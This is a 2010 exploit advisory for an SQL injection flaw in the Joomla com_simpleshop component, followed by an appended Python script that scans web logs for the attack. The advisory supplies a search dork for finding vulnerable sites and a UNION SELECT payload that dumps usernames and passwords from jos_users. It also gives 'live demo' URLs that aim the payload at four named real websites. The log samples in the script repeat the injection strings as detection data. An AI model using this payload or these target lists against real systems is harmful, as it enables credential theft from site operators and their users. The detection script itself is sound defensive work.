Joomla Component com_simpleshop SQL injection Vulnerability
Posted on 17 April 2010
===========================================================
Joomla Component com_simpleshop SQL injection Vulnerability
===========================================================

# Exploit Title : joomla component simpleshop SQL injection Vulnerability
# Date : 17 april 2010
# Author : Sudden_death (suddendeath404@yahoo.com)
# Software Link : N/A
# Platform/Tested on: Windows XP 2 SP 2
# myweb : http://suddendeath.000space.com/
# dork : inurl:option=com_simpleshop
# Code : -1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--

======================================================================

# EXPLOIT / c0de
-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--

# VULN IN HERE
http://localhost/joomla/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=[c0de]

# LIVE DEMO
http://restrive.co.za/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
http://www.textusllc.com/site/index.php?option=com_simpleshop&task=browse&Itemid=92&catid=-3%20UNION%20SELECT%201,username,3,4,password,6,7,8%20from%20jos_users--
http://www.dpisb.com/cms/index.php?option=com_simpleshop&task=browse&Itemid=115&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
http://gfhomebrewing.com.au/index.php?option=com_simpleshop&task=browse&Itemid=31&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--

[#]-------------------------------------------------------------------
GREETZ TO
WE FORUM: [ indonesianhacker[dot]com | indonesiandefacer[dot]org ]
[#]-------------------------------------------------------------------
MY BROTHA :
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D |
[#]-------------------------------------------------------------------
note : do not say everything you know, but know everything you say!

# Inj3ct0r.com [2010-04-17]
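
A detection check for the request pattern this advisory describes, as an added example that is not part of the original advisory: it scans web access logs for com_simpleshop requests whose catid is not a plain integer, including double-encoded values. The combined log format, the rule that a legitimate catid is a non-negative integer, and all sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of an access-log entry in "combined" format (assumed log format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category id is a plain non-negative integer.
VALID_CATID = re.compile(r"^\d{1,10}$")
# Constructed sample entries (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Apr/2010:10:00:00 +0000] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Apr/2010:10:00:05 +0000] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8-- HTTP/1.1" 200 7342',
    '203.0.113.9 - - [17/Apr/2010:10:00:09 +0000] "GET /index.php?option=com_simpleshop&task=browse&catid=-1%2520UNION%2520SELECT%25201,2,3,4,5,6,7,8-- HTTP/1.1" 200 7342',
    '192.0.2.11 - - [17/Apr/2010:10:00:12 +0000] "GET /index.php?option=com_content&catid=news HTTP/1.1" 200 2048',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2520) so encoded payloads are not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_catid(target):
    """Return the decoded catid if a com_simpleshop request carries a non-integer catid."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_simpleshop" not in params.get("option", []):
        return None
    for raw in params.get("catid", []):
        value = fully_decode(raw).strip()
        if not VALID_CATID.match(value):
            return value
    return None


def scan(lines):
    """Yield (client_ip, decoded_catid) for every flagged log line."""
    for line in lines:
        m = REQUEST_RE.match(line)
        value = suspicious_catid(m.group("target")) if m else None
        if value is not None:
            yield m.group("ip"), value


if __name__ == "__main__":
    print(list(scan(SAMPLE_LOG)))
```

The same integer-only rule, enforced server-side before catid reaches the query, is the corresponding input-validation fix.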